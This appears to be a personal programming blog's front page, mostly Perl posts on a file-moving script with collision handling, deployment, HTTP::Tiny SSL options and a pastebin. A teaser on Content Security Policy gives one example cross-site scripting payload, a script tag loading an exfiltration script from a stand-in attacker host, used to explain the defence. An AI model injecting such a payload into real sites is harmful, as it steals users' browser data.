I wanted to move a large number of files from one directory to another, but the target directory already had many of the filenames already used. This is a common enough problem — digital cameras use DSC#, video downloaders often append numbers to get a unique filename, and so on. In both those examples, the sequence restarts if you empty the program’s work directory. So, you’ll end up with DSC0001.jpg every time you empty your camera’s memory card. If you’re trying to move such files into a single directory, you’ll get conflicts every time.
Instead of manually renaming the files before transferring them, I wrote a simple script to give each file a unique name in the destination directory.
Mimicing mv
First, we get the arguments. Like mv, this script can take both SOURCE DEST (to rename a single file/dir to the given name), and SOURCE(S) DIRECTORY to move several sources into a single directory. Here’s how we do that:
use Path::Tiny;
my @source;
push @source, path(shift)
while @ARGV > 1; # Accept multiple SOURCEs,
my $dest = path(shift); # but only one DEST/DIRECTORY.
my $dest_is_dir = $dest->is_dir; # Was DEST a directory?
Now that we have our inputs, and we disambiguated the final argument by checking if it is a directory or not, we can start to actually move the files. Note that all the paths are Path::Tiny objects.
First, we’ll have to handle the case where we’re moving files into a target directory (rather than to a specified name). Then, we simply call the move method to move each file appropriately.
foreach my $from (@source) {
my $to = path( $dest, ($dest_is_dir ? $file->basename : ()) );
$from->move($to);
}
At this point, the basic framework of what we want is there, but there are several complications. The first is in the spec: we want to pick some random name if we can’t do the rename because the target filename is already taken. The second is handling what the rename(2) system call won’t: moving files across filesystem boundaries. The last one is doing a bit of de-duplication.
Handling name collisions
I used the tempfile routine to get a unique filename. Normally, this creates a temporary file (which is removed when the object goes out of scope) — but we want to simply use this to pick a unique filename. To do that, we’ll need UNLINK => 0. These files are usually created in the temporary directory, but we want to create them in the target directory, so we use the DIR option.
I also chose to stick the random part of the filename right before the file extension, instead of at the end. This makes it easier to continue to use globbing like *.jpg in the directory once we’re done.
if ($to->exists) {
my ($prefix, $suffix) = $to->basename =~ m{^(.*)\.(\w+)$};
$to = Path::Tiny->tempfile(
UNLINK => 0,
TEMPLATE => ($prefix // $to->basename) . '-XXXXXX',
DIR => $dest_is_dir ? $dest : $dest->dirname,
( $suffix ? (SUFFIX => ".$suffix") : () ),
);
warn "File already exists, renaming to $to\n";
}
Moving across filesystem boundaries
The second complication is that this uses the system’s rename call, which (usually) doesn’t move files across filesystem boundaries. My media directories are on another filesystem, so this is a deal breaker for me. Let’s catch that error condition — we can handle it by copying the file, and deleting the original.
use Try::Tiny;
use POSIX qw(:errno_h);
...
try {
$from->move($to);
}
catch {
die $_ unless $_->isa('autodie::exception');
if ($_->errno == EXDEV) { # Invalid cross-device link
$from->copy($to);
$from->remove;
}
else {
die $_;
}
};
Some de-duplication
In the case of a name collision, there is some probability that the two files are actually the same. In the case when they’re not, the behaviour we have so far is correct. But in the case where you’re moving an identical file, it might be nice to not dump another copy into the destination. We can detect duplicate files, and just nuke the source file if there is already a copy at the destination.
To detect duplicates, we can use a hashing scheme like MD5 or SHA-1, but that can be expensive. We might be moving large media files around, and hashing file content would require reading both files off the disk. We can try to short-cut that by checking if the files have identical size — if not, we can short-circuit the check. Only if they’re the same size do we need to hash the contents. Since we’re not scouring the directory for duplicates (we’re only going to notice them when there is a name collision), this will probably be okay.
my $duplicates = sub {
my $A = shift;
my $B = shift;
return if $A->stat->size != $B->stat->size; # avoid reading file off disk
# Pull out the big guns
require Digest::MD5;
return
Digest::MD5->new->addfile( $A->filehandle('< ', ':raw') )->digest
eq
Digest::MD5->new->addfile( $B->filehandle('< ', ':raw') )->digest
;
};
...
if ($to->exists) {
if ($args{deduplicate}) {
STDERR->autoflush(1);
print STDERR "File already exists; checking for duplication..." if $VERBOSE;
if ($duplicates->($from, $to)) {
print STDERR " `$from' and `$to' are duplicates; removing the source file.\n" if $VERBOSE;
$from->remove;
next;
}
else {
print STDERR " `$from' and `$to' are not duplicates.\n" if $VERBOSE;
}
}
# pick a unique name and continue on as before
...
TL;DR
And there you have it: a simple script to help you avoid some tedium. I hope it works for you. If not, the code is on github.
App::mvr is available on CPAN if you want to give it a try. The use case is fairly narrow, but it was fun to play around with as a break from studying for finals. Path::Tiny in particular is a nice addition to my toolbox.
Posted: April 19th, 2013, by
Mike Doherty
Categories:
Linux,
Perl,
Programming
Tags:
Linux,
new-code,
path-tiny,
Perl
Comments:
8 Comments.
Moose led to Mouse led to Moo led to Mo led finally to M, which gives you the least object-orientation possible, which is none at all. I quipped that Perl desperately needed a new OO module called Noose - just enough object orientation to hang yourself. Read more »
Posted: February 7th, 2013, by
Mike Doherty
Categories:
Perl,
Programming
Tags:
acme,
cpan,
moose,
new-code,
noose,
oo,
twitter
Comments:
No Comments.
The same-origin policy is a fundamental part of the security infrastructure of the web. It prevents a web site’s scripts from accessing and interacting with scripts used on other sites. This helps keep your data safe because if your bank’s website gives you some data, it can only be accessed by your bank’s website, and not by scripts from other websites.
That’s a nice theory, it’d be a shame if some evidence happened to it.
In the real world, attackers have found ways to get around the same-origin policy to gain access to data they’re not supposed to be able to access. For example, a web programmer might mistakenly include some user-provided input verbatim in the HTML of a webpage — perhaps a username. Well, if your username is <script type="text/javascript" src="http://evil.attacker.com/exfiltrate_browser_data.js"></script>, then how is the web browser supposed to know if that was intentionally put in the HTML of the page? Same-origin policies are insufficient in the face of programmer error. Enter Content Security Policy.
Read more »
I’ve just finished reading Gabriella Coleman‘s new book “Coding Freedom: The ethics and aesthetics of hacking” (2013, Princeton University Press) which culminates over a decade of field research, in-depth interviews, observation, and participation in the hacker scene globally. In this case, “hacker” refers to the free/open-source software (FOSS) hacker, and in particular the Debian project.
Read more »
At Pythian, we have one application that is composed of several components, the deployment of which needs to conform to our slightly peculiar server setup. Until recently, this required manually deploying each component. I did this a couple weeks ago, and it took me something like 40 hours to figure out and complete. As I went, I started reading up on Module::Build, trying to figure out how to automate as much as possible. It turns out that this core module gives us a surprisingly powerful tool for customized deployment. First, it will help to understand a few aspects of how our code is deployed. Read more »
Posted: November 8th, 2012, by
Mike Doherty
Categories:
Linux,
Perl,
Work
Tags:
deployment,
module-build,
Perl,
Pythian
Comments:
5 Comments.
Perl does lots of things that make life easier, from postfix conditional and looping constructs, to DWIM-infused language design. One of interesting things I discovered when learning to open a file was that Perl can treat a scalar as an in-memory file:
my $string = "many\nlines\nof\ntext";
open my $in, '<', \$string;
while (<$in>) { print }
Read more »
Posted: September 15th, 2012, by
Mike Doherty
Categories:
Perl,
Programming
Tags:
bug,
doy,
git,
leont,
Perl,
yanick
Comments:
No Comments.
The technology world has many problems: sexism, homophobia and/or heterosexism, classism, ageism, trolls, and more – often reflecting the imperfections of broader society. One of the more pernicious problems is our denigration of the non-technical. Yes, science and technology are important, and computing in particular is important – but it is not everything. Science and technology are nothing without public understanding and engagement – a computer does nothing without an operator. Read more »
This is an update to an earlier post I wrote about the adventures I had in creating and using a mock LWP::UserAgent for testing purposes. The ever-vigilant mst overheard a conversation on the same topic, and jumped in. He pointed out that Test::MockObject (and everything using it) overrides UNIVERSAL::isa in a way that hides bugs. Because it can hide bugs, it is definitely not safe to use in a test suite, where you’re trying to uncover bugs.
The bottom line
Instead of following my earlier advice, use Test::LWP::UserAgent, a new module which avoids Test::MockObject and offers a better interface (in particular, the nonsense with subtypes is no longer needed) for creating and using mock LWP::UserAgent objects.
Posted: July 26th, 2012, by
Mike Doherty
Categories:
Perl,
Programming
Tags:
LWP,
mock,
moose,
mst,
testing
Comments:
No Comments.
In university, we do a lot of waterfall in courses with project work. It isn’t the kind of thing a student would do (to) themselves, so professors feel obligated to give us that experience in class. Research shows that both business and recent graduates wish they’d been taught agile development methodologies in university and college, but course content always lags behind.
At Pythian, we used a mostly-Scrum methodology, with all the benefits and challenges that entails. Read more »
In Tips & tricks from my 4 months at Pythian, I showed how to give a symlink a new target atomically. I wasn’t aware of any module to encapsulate that, so I quickly put together File::Symlink::Atomic.
This module is useful because it eliminates the need to know how to do this safely – simply
use File::Symlink::Atomic
and you get a drop-in replacement for CORE::symlink. It creates a temporary symlink (using File::Temp to get a unique pathname) pointing to your new target, then moves it into place with a rename call. On POSIX systems, the rename system call guarantees atomicity.
I put it on PrePAN to get some advice. I have no clue what that’ll do on any non-POSIX systems that have symlinks (if the OS doesn’t do symlinks, I can’t help you). Is a rename call universally atomic? If not, how can I detect those platforms, and provide that atomic guarantee some other way?
I didn’t get any feedback, so I chose to simply release the module. It’s now on CPAN. Enjoy!
Posted: May 26th, 2012, by
Mike Doherty
Categories:
Linux,
OS,
Perl,
Programming,
Work
Tags:
new-code,
Perl,
prepan
Comments:
1 Comment.
In the past month, a number of people have asked about the theme for this blog. I was particularly flattered that someone even asked where I bought it.
It is just a customized version of Joey Robinson’s Minimalist theme. My aim was to keep the same design principles – fast-loading, minimalism, readability – but update it to have a more modern look. One major goal was to have a truly great font via [ccie]@font-face[/ccie] on modern browsers, so I used the Junction font from The League of Movable Type. They’re an awesome group of free font designers – you should check out their other fonts too!
I also rewrote the javascript with jQuery, because mootools is ugh.
The new theme is called, unsurprisingly, “Hashbang” – and is now available on Github. Enjoy!
After working with Yanick Champoux on a few little Perl projects here and there, we finally met face-to-face at YAPC::NA last summer. A few months later, when I was looking for a co-op position, I immediately thought of Pythian. Read more »
Posted: May 19th, 2012, by
Mike Doherty
Categories:
Linux,
Perl,
Programming,
Work
Tags:
Linux,
Perl,
Pythian,
yanick
Comments:
4 Comments.
I was asked to add SSL support to a client library, while also moving from home-grown manual HTTP code to a proper module. HTTP::Tiny was ideal because it is pure-Perl, a core module since 5.14 (so it’ll be maintained), and it’s just one .pm file, making it easy to ship.
An application server that supported SSL was provided for testing purposes, but the SSL certificate didn’t match the hostname – HTTP::Tiny correctly rejected connections. I needed to be able to control the settings sent to the underlying IO::Socket::SSL object used for the encrypted connection so I could turn off security features for testing. As I worked on that, David Golden offered invaluable feedback, which greatly improved the design of the features added to HTTP::Tiny.
As of 0.018, HTTP::Tiny is more configurable, and has a simple interface for easily making SSL connections more secure. Read more »
Posted: April 18th, 2012, by
Mike Doherty
Categories:
Perl,
Work
Tags:
cpan,
dagolden,
Perl,
security,
SSL
Comments:
9 Comments.
Init scripts are annoying little things – almost entirely boilerplate. Here’s how I learned to stop struggling, and love Daemon::Control to control my daemons.
The module really is as simple as the synopsis - you describe the daemon, have it write an init script (which actually just runs your Daemon::Control script) for you, then update-rc.d and you’re golden. It really is that simple. Read more »
Posted: April 16th, 2012, by
Mike Doherty
Categories:
Linux,
Perl,
Programming
Tags:
Linux,
Perl
Comments:
3 Comments.
I’ve always favoured pastebins that let you bin a paste and nothing more – p.defau.lt and sprunge.us spring to mind. I’ve made a Perl almost-clone of sprunge.us:
http://p.hashbang.ca now runs WWW::Hashbang::Pastebin, a simple pastebin written with Dancer and DBIx::Class that does nothing but store your text and show it back to you. The only feature beyond that is if you append a +, you’ll get line numbering (no syntax highlighting). You can use an anchor to jump to any line (click the line number), and the number for that line will be highlighted.
To interact with the pastebin, just POST with paste content in p and get the URL back in the X-Pastebin-URL HTTP header (and in the body, so curl-ing will Just Work):
curl -F 'p=<-' http://p.hashbang.ca < /var/log/syslog
http://p.hashbang.ca/U
Or, use the Perl client, which provides a command-line tool to do the same thing (and also fetch paste content, given an ID).
Posted: April 15th, 2012, by
Mike Doherty
Categories:
Perl
Tags:
cli,
dancer,
dbix-class,
new-code
Comments:
1 Comment.